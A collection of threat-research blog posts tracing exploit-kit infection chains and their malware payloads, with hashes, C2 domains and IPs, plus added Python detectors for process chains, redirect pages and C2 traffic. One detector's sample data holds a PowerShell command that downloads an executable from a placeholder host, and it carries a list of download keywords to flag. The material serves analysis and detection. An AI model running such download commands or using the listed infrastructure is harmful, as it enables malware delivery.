Rig EK delivers Kronos Banker

Summary:

I took a break for a while, though I was still finding the usual Chthonic, Bunitu and Dreambot Rig EK flows from the usual HookAds, Rulan and Fobos campaigns. If you are interested in those let me know. I still have the PCAPs.

Someone also messaged me about changing the way I capture packets. I have not done this yet but will look into it.

Anyway today I found Kronos via malvertising which led to a website that contained 3 iframes that redirected to Rig EK. In this flow I was using IE 11 and the latest version of Flash.

I would be interested to know any domains that Kronos targets to see if I can see any injections occurring.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Kronos

https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/

Downloads

(in password protected zip)

Details of infection chain:

Full Details:

Found initially through malvertising, the dummy website has 3 iframes on it that redirect to Rig EK.

[image: tripleFrame]

The payload was Kronos Banker. The first EXE was dropped by Rig. It then created the second EXE and eventually injected itself into svchost:

SHA256: b024266f710c6c7a1517d4623e048b8c564dabf9ac294ba6317762fa6c830142
File name: vqb1zpvr.exe
Detection ratio: 19 / 65
SHA256: ffc1cfe4cfa36477ead629bd1a2c6ffb266502c3261b85de431137da411320a8
File name: domain.exe
Detection ratio: 8 / 62

I saw three domains associated with Kronos in total. POST requests were made to “/kronos/connect.php”:

kgkjvkjgvkgvkhg.xyz
khgkjhkjghkjgh.xyz
kljhlkjhkljh.xyz

[image: kronosCnC]

Viewing the functions of “domain.exe” shows what appears to be form grabbing and HTML injection.

[image: functions]

Magnitude EK drops Cerber (Scriptlet changed to “.bmp”)

Summary:

It’s been a fairly standard week for Rig EK. I’ve not spotted anything new or interesting so I decided not to blog about it this week. I did however discover a change in Magnitude EK. It’s a small one but the scriptlet now has the extension “.bmp” instead of “.ico”.

I also ran this flow with the latest IE 11 and Flash Player and still got Cerber Ransomware (still calling itself CRBR). If you’ve ever fiddled with security settings you’ll probably scream that scriptlets are disabled by default, which is true. I did play with the security settings to try to see what payload the scriptlet drops. Alas they still failed as usual and Cerber appeared from its normal vector.

Background Information:

  • Article from RSA; although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK drops “CBRB” (Cerber Ransomware)

Magnitude EK via malvertising delivers Cerber Ransomware

Downloads (in password protected zip)

Details of infection chain:

[image: MagnitudeBMP]

Full Details:

Just to note for this flow I ran IE 11 downloaded straight from the MS website and the latest Flash was installed. This was to demonstrate the need to patch your operating system, as clearly these updates were not enough to stop Magnitude (albeit I did lower IE security settings).

[image: FlashPlayerIEVersion]

Most notable about this flow is the change in the naming of the scriptlet used by Magnitude EK.

The scriptlet is called in the landing page. I have deobfuscated most of it and you can see the call to the “.bmp” scriptlet. Previously it was “.ico”.

[image: ScripletCall]

This is the scriptlet mostly deobfuscated with some variables renamed. Here you can see an executable is dropped and run with cmd. These executables always fail and are 0 kb. I’m not sure why this is the case.

[image: ScriptletDecode]

If you enlarge this picture you will see a condensed version of all the processes that were run on the endpoint.

[image: MagProcesses]

The payload is Cerber Ransomware. This version calls itself “CBRB”.

[image: cerberpic]

This version of Cerber is at least a week old (the UDP patterns are identical, but the sample is fresh from the 3rd); however, it still does a good job of evading a lot of AV vendors.

SHA256: 46e29c56d426a4c16548b74f77b2fdd75005ddac1333039567d16212cdc585e4
File name: a.exe
Detection ratio: 14 / 61

Magnitude EK drops “CBRB” (Cerber Ransomware)

Summary:

Whilst the Petya variant ransomware campaign is occurring, the use of WMIC reminded me of Magnitude EK, which also uses it to run the payload. It’s also able to run PowerShell commands.

I hope to do a few learning tutorials on Magnitude in the near future, mainly focusing on deobfuscation as it is vastly more complex than Rig EK. My current stumbling block is that I’m not entirely sure what the function of the 2nd part of the landing page is. If you know give me a nudge (it’s the “further exploits” part). It is not included in any articles that I have found.

This version of Cerber calls itself “CBRB” which is odd.

Background Information:

  • Article from RSA; although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK via malvertising delivers Cerber Ransomware

Downloads (in password protected zip)

Details of infection chain:

[image: MagnitudeEK28]

Magnitude EK drops “CRBR” Ransomware

Full Details:

At some point I hope to take a deep dive into Magnitude EK, mostly focusing on deobfuscation. The first gate for example uses your “window.screen” object to generate the next URL and it’s quite interesting.

Although not shown in the main picture, a new trend for Magnitude is a double landing page which causes duplicate traffic.

[image: DoubleLanding]

For now here is a list of processes that were executed:

[image: processes]

You can see the scriptlet is run, which drops 3 payloads, all of which fail. I’m not sure why they fail, but it’s possible that, as the Flash request is one of the very first requests in the actual landing page, Magnitude has already decided how to drop the payload and so these fail. I will try it one day without Flash.

A PowerShell command is run to download a file called “b.exe” and finally WMIC is used to run the payload “a.exe”.
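As a defender-side illustration of the process chain just described (browser, then cmd.exe running a dropped executable, powershell.exe downloading “b.exe” and wmic.exe launching “a.exe”), here is an added Python example that is not part of the original post or its PCAPs: it walks a set of constructed, Sysmon-style process-creation events and flags LOLBins whose parent chain leads back to a browser. The event fields, the sample command lines, the example.invalid host and the PS_DOWNLOAD_MARKERS list are assumptions made for this example, not data from the flow.

```python
"""Flag browser-spawned LOLBin activity of the kind seen in the Magnitude EK
flows: cmd.exe running a dropped executable, powershell.exe used to download
a file, and wmic.exe used to launch the payload."""
from dataclasses import dataclass

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "wmic.exe"}
# Substrings that mark a PowerShell download (assumed list, not from the post).
PS_DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon-style fields, constructed here)."""
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str


# Constructed sample events; hosts and paths are placeholders, not the post's data.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(200, 100, "iexplore.exe",   "iexplore.exe"),
    ProcEvent(210, 200, "iexplore.exe",   "iexplore.exe SCODEF:200 CREDAT:1"),  # content process
    ProcEvent(300, 210, "cmd.exe",        r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\x1.exe"'),
    ProcEvent(310, 210, "powershell.exe", "powershell.exe -c (New-Object Net.WebClient).DownloadFile("
                                          "'http://gate.example.invalid/b.exe',"
                                          "'C:\\Users\\user\\AppData\\Local\\Temp\\b.exe')"),
    ProcEvent(320, 210, "wmic.exe",       r'wmic.exe process call create "C:\Users\user\AppData\Local\Temp\a.exe"'),
    ProcEvent(400, 100, "cmd.exe",        "cmd.exe"),   # benign: shell opened from Explorer
]


def has_browser_ancestor(ev, by_pid, max_depth=16):
    """Walk the parent chain and report whether a browser sits above ev."""
    cur, depth = by_pid.get(ev.ppid), 0
    while cur is not None and depth < max_depth:
        if cur.image.lower() in BROWSERS:
            return True
        cur, depth = by_pid.get(cur.ppid), depth + 1
    return False


def classify(ev, by_pid):
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    image, cmd = ev.image.lower(), ev.cmdline.lower()
    if image in LOLBINS and has_browser_ancestor(ev, by_pid):
        reasons.append("browser-spawned-lolbin")
    if image == "powershell.exe" and any(m in cmd for m in PS_DOWNLOAD_MARKERS):
        reasons.append("powershell-download")
    if image == "wmic.exe" and "process call create" in cmd:
        reasons.append("wmic-process-create")
    if image == "cmd.exe" and ".exe" in cmd and "\\temp\\" in cmd:
        reasons.append("cmd-runs-temp-exe")
    return reasons


def detect(events):
    """Map pid -> reasons for every event that triggers at least one rule."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: r for e in events if (r := classify(e, by_pid))}


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The ancestry walk is what separates this from a plain command-line grep: a user-opened cmd.exe under Explorer (pid 400) is left alone, while the same binary under the IE content process is flagged even before its command line is inspected.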

The payload is of course Cerber Ransomware. This version calls itself “CBRB”.

[image: cerberpic]

When I submitted it to VT it had relatively few detections and none directly refer to it as Cerber, though some vendors may call it other things.

SHA256: efe238b3d28c819b27abe668d1188d7534101bcf9a1cfef0c7d56e33b00b8424
File name: a.exe
Detection ratio: 13 / 61

Rig EK via JS Redirector leads to Pushdo dropping Cutwail.

Summary:

Today I found a probable compromised website that contained a harmless looking script by name at least. However it led to a website hosting a JavaScript redirector to Rig EK. The chain is interesting and I have not seen one like it yet since I started doing this.

The payload was Pushdo dropping Cutwail. Thanks to @Antelox for the identification. Although this is an old botnet/spammer it had been spotted by @DynamicAnalysis late last year (https://malwarebreakdown.com/2016/10/20/eitest-leads-to-rig-ek-at-185-45-193-52-which-drops-cutwailpushdo-botnet/).

The malware aggressively spammed POST requests and SMTP eating up my disk space rapidly. There is an interesting deep dive by Trend and Blueliv regarding this malware below.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Pushdo/Cutwail

https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf

https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/

Downloads

(in password protected zip)

Details of infection chain:

[image: RigCutwail]

Rig EK via a JavaScript redirector delivers Pushdo dropping Cutwail

Full Details:

I found this website through malvertising. It appears to be an old, probably compromised or even fake, website that contains a script that appears harmless at a glance.

[image: adultsite]

The script appears at the bottom of the page and appears to be named similarly to a legitimate script called “js/wp-emoji-release.min.js?ver=4.4.10”.

[image: Harmless]

The script contains code which is likely profiling then redirects to another domain hosting a JavaScript file.

[image: FakeSCript]

This script contains a 301 redirect to another script called “scr.php”. This contains what looks like two JavaScript redirectors leading to Rig EK.

[image: FrameToRig]

The payload was Pushdo dropping Cutwail. Pushdo is a downloader dropping Cutwail, which refers to the spamming module of the Pushdo botnet.

SHA256: 93b920e774874615c40b0b59149ea0200f2c23ece5e27ca1230ffa4d646c45b2
File name: g45g4yh.bin
Detection ratio: 11 / 60

Although my PCAP will have most if not all the traffic, VT also seemed to capture the POST requests in the Behaviour section, which is useful for IOCs.

The malware created multiple svchost processes and a startup entry. The processes began to multiply as time went on. It does not do a great job at hiding itself and did not delete itself from temp.

[image: startup]

[image: Pushdo]

It then began violently spamming POST requests and SMTP.

[image: SMTPspam]

[image: violentposts]

Here is a sample POST request which appears to return a website.

[image: POST]

Four Rig EK Flows from Malvertising (Bunitu & Chthonic)

Summary:

Here I have four Rig EK flows from 13-16 June from malvertising chains. The payloads were Chthonic and Bunitu. I have not gone into much detail in this blog regarding the infection chains as I have already written about them in previous blogs. These however are all new referrers which may be worth noting.

There are 3 gates here to redirect to Rig:

  • A simple 302 redirect
  • Bunitu’s “Small Gate”
  • At least two domains with the same pattern “IndexZ Gate”

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Oldish article regarding Chthonic banking trojan:

https://securelist.com/blog/virus-watch/68176/chthonic-a-new-modification-of-zeus/

  • Article on Bunitu Trojan:

https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/

Downloads

(in password protected zip: (infected))

Details of infection chain:

[image: MultiRig]


Four samples of Rig EK from malvertising

Full Details:

All flows were found through malvertising chains between 13-16 June 2017. Below are two previous blogs that cover Chthonic and Bunitu.

Due to time issues I was unable to capture all the activity from my lab. Instead, with the assistance of @LedTech3, I was able to recover the payloads from the PCAPs. I have run them through Hybrid Analysis.

advert-mal.bin (Chthonic)

[image: 302Malvert]

302 to Rig EK

SHA256 – 159cda8598b1916bcdeba8c31b88183e576d49673da6635c26f36ff9c291de07

C2 – HTTP – POST – pationare.bit/ – 86.110.117.53
POST – pationare.bit/www/ – 86.110.117.53

https://www.hybrid-analysis.com/sample/159cda8598b1916bcdeba8c31b88183e576d49673da6635c26f36ff9c291de07?environmentId=100

jackportreroll-mal.bin (Bunitu)

[image: small]

Small Gate to Rig EK, page always contains the “small” tag and always drops Bunitu

SHA256 – 61982aa119f5297d23300d59a1f7bcc030348025d8a224ca50894652d815a42b

C2 – DNS – p.onlinecbbeer.com – 84.210.101.33
DNS – f.onlinecbbeer.com – 94.106.242.28

https://www.hybrid-analysis.com/sample/61982aa119f5297d23300d59a1f7bcc030348025d8a224ca50894652d815a42b?environmentId=100

shoppinwithus-mal.bin (Chthonic)

[image: IndexZ-2]

iframe to Rig EK. I will keep monitoring to see if it recurs often enough to call it the “IndexZ Gate”.

SHA256 – afc31940380359380f27cd0cbcc18f9eb67027107d434d190a725f124b1b554e

C2 – HTTP – POST – letit2.bit/home/www/ – 47.91.124.165
POST – letit2.bit/www/ – 47.91.124.165

https://www.hybrid-analysis.com/sample/afc31940380359380f27cd0cbcc18f9eb67027107d434d190a725f124b1b554e?environmentId=100

youcaught-mal.bin (Chthonic)

[image: IndexZ]

iframe to Rig EK. I will keep monitoring to see if it recurs often enough to call it the “IndexZ Gate”.

SHA256 – 4a96c45844fa6719b91d525c97b9cad479c92eec44c16f969ce7f3a3aa1a99c1

C2 – HTTP – POST – letit2.bit/home/www/ – 47.91.124.165
POST – letit2.bit/www/ – 47.91.124.165

https://www.hybrid-analysis.com/sample/4a96c45844fa6719b91d525c97b9cad479c92eec44c16f969ce7f3a3aa1a99c1?environmentId=100

Rig EK via malvertising drops Dreambot

Summary:

Recently I, like many other researchers, have found a lot of Rig EK from malvertising. Today I revisited an old site called “likexhamster” which last May was dropping Chthonic via a fake ad domain served by a popunder script.

This time the same mechanism dropped Dreambot, also known as Gozi. Additionally, Rig EK appears to have been changing its URL patterns of late. I was collecting several samples to investigate but @nao_sec has posted a series of tweets which reveal the extent of the changes.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Dreambot:

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

Downloads

(in password protected zip: (infected))

Details of infection chain:

[image: Dreambot]

Rig EK via an ad on a porn website delivers Dreambot

Full Details:

The infection chain begins on a porn website called “likexhamster”. This site is filled with ads, though one particular popunder script loads a fake ad, “occurent.info”. Below you can see the script and then what was returned after the “eval” function.

[image: popunderreturn]

The ad leads to what appears to be the Rig EK pre-landing page. If the environment passes the checks, a redirection to Rig EK occurs.

[image: adbanner]

Note the Rig EK URL parameters:

[image: rigurlparams]

The payload was Dreambot – an information stealer/banking trojan AKA Gozi/ISFB.

SHA256: d193de89f70c1049999eabf12a3523b01c695bb536ece4de8ddc62ac71a12424
File name: d193de89f70c1049999eabf12a3523b01c695bb536ece4de8ddc62ac71a12424.bin
Detection ratio: 15 / 61

Dreambot connects to a CnC server using a URL that contains the strings “images” and “.avi”, though I have seen other variants of Ursnif use different strings such as “.jpeg”.

[image: dreambottraffic]

The below image shows some of the actions Dreambot took during behavioural analysis.

[image: dreambotactions2]

Dreambot sends data over TOR. Below is a screenshot of some of the domains.

[image: dreambot]

Rig EK via Malvertising drops Zloader and Chthonic

Summary:

I have been following an IP over the past week which I originally found dropping an interesting coin miner. In an attempt to find this miner again (as it appeared to be in development) I began to look into it in more detail.

When a specific resource is requested the browser is redirected to Rig EK or to a fake Flash file. All sites use the http-equiv attribute to refresh the page, loading the Rig EK landing page URL. So far I have observed a coin miner, Chthonic and Zloader as payloads.

Unfortunately I had so many payloads and PCAPs that I got lost within them, and owing to a lack of time I have not been able to prepare my usual style of blog. Nonetheless, this IP is a great source of Rig EK for those interested in studying it.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

Downloads

(in password protected zip: (infected))

Details of infection chain:

[image: DCDcY96XcAEyez2]

Rig EK displays “Shadow Fall”, drops Chthonic.

Full Details:

Lately I have been following an IP that is serving Rig EK via an http-equiv “REFRESH” attribute. This causes the page to refresh and “redirect” the browser to Rig EK.

[image: ChtonicPic]

The IP (ASN 24940, Hetzner Online AG) has several domains registered to it with a general theme of “XXXredirect.ru”.

[image: VTPic]

https://www.virustotal.com/en/ip-address/144.76.174.172/information/

Originally I found a domain hosted on this IP through RoughTed -> Rig EK via RoughTed drops a Miner

I have also found it through an “Onclkds” variant which is shown in the picture.

You can also just browse directly to one of these domains however you need to add a resource. So far I have seen three of these:

XXXredirct.ru/lan – Rig EK -> Chthonic

[image: Chtonic1]

https://www.hybrid-analysis.com/sample/8b2fe525ddcb3d56154a3583e8e14467046e31358a89ef56b1e9e39672f779c9?environmentId=100

XXXredirct.ru/1 – Rig EK -> Zloader

[image: Zloader1]

https://www.hybrid-analysis.com/sample/e1977df942e969abf6ae7c7d408766d4e8d6fb50f785ea5af384bbb068bfb86a?environmentId=100

XXXredirct.ru/xfile – Fake Flash -> Chthonic

[image: Chth2]

https://www.hybrid-analysis.com/sample/66cc94449e7d45bafd9fb72668d3112bb3a156573f374139dc36dd0f8b8ffa22?environmentId=100

There is a bit more information on the Flash file from the Twitter:

I also made a few tweets (and referenced in some) throughout the week in case you missed them:

And a bonus post of Bunitu and Magnitude:

Rig EK via Fake EVE Online website drops Bunitu.

Summary:

Through RoughTed I found my old Bunitu chain. This time instead of poker or adult themes, the threat actors are using EVE Online which is a very popular space themed MMORPG.

The fake website contained the same redirection mechanisms as previous Bunitu posts. That is, it redirects to a domain hosted on the same IP and then there is an iframe to Rig EK containing the “small” tag. I did not test the fake EVE website to determine if any phishing was involved.

Oddly I found strings for Space Invader within Bunitu. It will be interesting if anyone can find out why that is so.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Bunitu Trojan:

https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/

  • Article on Rough Ted:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

Downloads

(in password protected zip)

Details of infection chain:

[image: hehre]

Rig EK via a fake EVE Online site drops Bunitu proxy trojan.

Full Details:

RoughTed is a malvertising operation known for its wide scope. See the Malwarebytes article above for a more in-depth dive.

[image: roughted.PNG]

This led to a fake EVE Online website which appears to mirror the official EVE Online. Below is what the fake website looks like.

[image: EVEPhish]

The website contains an iframe to a domain hosted on the same IP address.

[image: frametomal]

This domain contains an iframe leading to Rig EK. As with previous Bunitu posts, this gate always contains the “small” tag.

[image: smallgate.PNG]

Rig EK then dropped Bunitu proxy trojan. Bunitu opens random ports by changing firewall settings and allows the host to become a remote proxy. Every time a client connects, Bunitu issues a DNS request. Although these did not trigger any ET signatures I am sure they are initiated by Bunitu.

Usually I would link a Virus Total link or a Hash but I will update that later.

The below shows strings associated with firewall changes and the DLL that is dropped.

[image: morestrings]

Interestingly, I found strings for Space Invaders. I’m not sure why these are present!

[image: spacestrings]

Rig EK Via RoughTed Delivers Chthonic

Summary:

Using the malvertising operation RoughTed again, I came across a flow highly similar to the one I found yesterday that dropped a miner. The compromised website used the http-equiv attribute to refresh the page, revealing Rig EK.

The payload was a ZeuS variant known as Chthonic. Aside from using tools to statically analyse the binary, I did submit it to Hybrid Analysis as there were some anomalies when it ran on my host.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Oldish article regarding Chthonic banking trojan:

https://securelist.com/blog/virus-watch/68176/chthonic-a-new-modification-of-zeus/

  • Article on Rough Ted:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

Downloads

(in password protected zip: (infected))

Details of infection chain:

[image: gergeggr]

Rig EK via RoughTed malvertising delivers ZeuS Chthonic 

Full Details:

RoughTed is a malvertising operation known for its wide scope. See the Malwarebytes article above for a more in-depth dive.

[image: roughted]

RoughTed led to a compromised website that used the “http-equiv” attribute to refresh the page, which presents the Rig EK landing page.
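The redirect hooks seen across these posts, the meta http-equiv refresh used here and in the XXXredirect.ru flows, iframes to Rig EK (the Kronos triple iframe, the Bunitu “small” gate) and script-based redirectors (the fake wp-emoji script in the Pushdo post), can all be pulled out of a saved landing page with the Python standard library. The following is an added example, not code from this blog; the sample HTML and every example.invalid host are constructed for it.

```python
"""Extract the redirection hooks a gate page can carry (meta refresh targets,
iframe sources and external script sources) and report those that leave the
page's own host."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def parse_refresh_target(content):
    """Pull the URL out of a meta-refresh content value such as
    "0;url=http://x/" or "0; URL='http://x/'"; None if there is no URL part."""
    _delay, sep, rest = content.partition(";")
    if not sep:
        return None
    rest = rest.strip()
    if rest[:3].lower() == "url":
        rest = rest[3:].lstrip().lstrip("=").strip()
    rest = rest.strip("'\"")
    return rest or None


class RedirectExtractor(HTMLParser):
    """Collect (kind, absolute_url) for every redirect-capable tag."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.found = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            target = parse_refresh_target(a.get("content", ""))
            if target:
                self.found.append(("meta-refresh", urljoin(self.page_url, target)))
        elif tag == "iframe" and a.get("src"):
            self.found.append(("iframe", urljoin(self.page_url, a["src"])))
        elif tag == "script" and a.get("src"):
            self.found.append(("script", urljoin(self.page_url, a["src"])))


def offsite_redirects(page_url, html):
    """Return (kind, url) for every hook whose host differs from page_url's."""
    p = RedirectExtractor(page_url)
    p.feed(html)
    p.close()
    own = (urlsplit(page_url).hostname or "").lower()
    return [(k, u) for k, u in p.found if (urlsplit(u).hostname or "").lower() != own]


# Constructed gate page; hosts are placeholders, not the posts' indicators.
SAMPLE_PAGE_URL = "http://compromised.example.invalid/index.html"
SAMPLE_HTML = """<html><head>
<meta http-equiv="REFRESH" content="0; URL='http://gate.example.invalid/lan'">
<script src="/js/wp-emoji-release.min.js?ver=4.4.10"></script>
<script src="http://redir.example.invalid/js/wp-emoji-release.min.js?ver=4.4.10"></script>
</head><body>
<iframe src="http://ek1.example.invalid/?x=1" width="1" height="1"></iframe>
<iframe src="http://ek2.example.invalid/?x=2"></iframe>
<iframe src="/local/widget.html"></iframe>
</body></html>"""


if __name__ == "__main__":
    for kind, url in offsite_redirects(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{kind:13} {url}")
```

Relative sources are resolved against the page URL before the host comparison, so a same-site script that merely shares a legitimate-looking filename is not reported, while the off-site copy of it is.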

[image: httpequiv]

Rig EK crashed my browser, forcing me to restart. By the time I had recognised I was on the landing page (3 secs in) the payload had already cleaned itself up, so I refreshed the page, causing a 2nd flow.

[image: rigflow]

According to the 2014 article by Securelist, Chthonic has the following capabilities:

[image: Capabilities]

I was able to peer at the strings and came across what looks like security questions or checks:

[image: strings]

The binary has a relatively low detection rate. It was 12+ hours since I found it and currently it has 9 detections on VT.

SHA256: 636fd02a030b99c2af3245052f9ff0c6d80b27e6f159a98ff1a1dba83634db9a
File name: lwlri630.exe
Detection ratio: 9 / 60

Chthonic performed POST requests to “patrionare.bit”. I believe this to be the malware downloading modules. The binary did not prompt for a restart (I had UAC turned off) or even force a restart. After restarting, the CnC traffic was observed, but it had not injected itself into another process and neither did it create an executable as observed in the HA report.

[image: zeuscnc]
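Three of the C2 patterns in these posts are simple enough to check against proxy logs: Kronos POSTing to “/kronos/connect.php”, Chthonic POSTing to .bit (Namecoin) hosts such as pationare.bit and letit2.bit, and Dreambot/Ursnif fetching “images” URLs ending in “.avi” or “.jpeg”. The Python below is an added example, not part of the blog; the log line layout, the cnc.example.invalid and example.com hosts and the tag names are assumptions, while the .xyz and .bit hosts are the ones listed in the posts.

```python
"""Scan proxy-style HTTP log lines for the C2 patterns noted in these posts:
Kronos POSTs to /kronos/connect.php, Chthonic POSTs to .bit hosts, and
Dreambot/Ursnif GETs whose path carries "images" and a media extension."""
import re
from urllib.parse import urlsplit

# Constructed log lines in a simple "timestamp client method url status" layout.
# The .xyz and .bit hosts are from the posts; the other hosts are placeholders.
SAMPLE_LOG = """\
2017-06-17T10:01:02Z 10.0.0.5 POST http://kgkjvkjgvkgvkhg.xyz/kronos/connect.php 200
2017-06-17T10:01:09Z 10.0.0.5 POST http://pationare.bit/www/ 200
2017-06-17T10:02:30Z 10.0.0.7 GET http://cnc.example.invalid/images/AbC12_x/k9.avi 200
2017-06-17T10:02:31Z 10.0.0.7 GET http://cnc.example.invalid/images/Q2/z.jpeg 200
2017-06-17T10:03:00Z 10.0.0.9 GET http://www.example.com/images/logo.png 200
2017-06-17T10:03:05Z 10.0.0.9 POST http://www.example.com/contact.php 302
"""

LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")
KRONOS_PATH = "/kronos/connect.php"
DREAMBOT_EXTS = (".avi", ".jpeg")   # the two variants the posts mention


def classify_url(method, url):
    """Return the list of indicator tags matching one request (empty if none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    tags = []
    if method == "POST" and path.endswith(KRONOS_PATH):
        tags.append("kronos-connect")
    if host.endswith(".bit"):
        # .bit is a Namecoin TLD that ordinary DNS resolvers do not serve, so
        # legitimate software on a corporate network almost never requests it.
        tags.append("namecoin-bit-host")
    if method == "GET" and "images" in path and path.endswith(DREAMBOT_EXTS):
        # Loose by design: corroborate with the host's reputation before acting.
        tags.append("dreambot-style-image-url")
    return tags


def scan(log_text):
    """Parse each log line and return (client, url, tags) for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue   # skip malformed lines rather than abort the whole scan
        _ts, client, method, url, _status = m.groups()
        tags = classify_url(method, url)
        if tags:
            hits.append((client, url, tags))
    return hits


if __name__ == "__main__":
    for client, url, tags in scan(SAMPLE_LOG):
        print(client, url, ",".join(tags))
```

The Dreambot rule is deliberately the weakest of the three and should be treated as a lead rather than a verdict; the .bit and Kronos-path rules are specific enough to alert on directly.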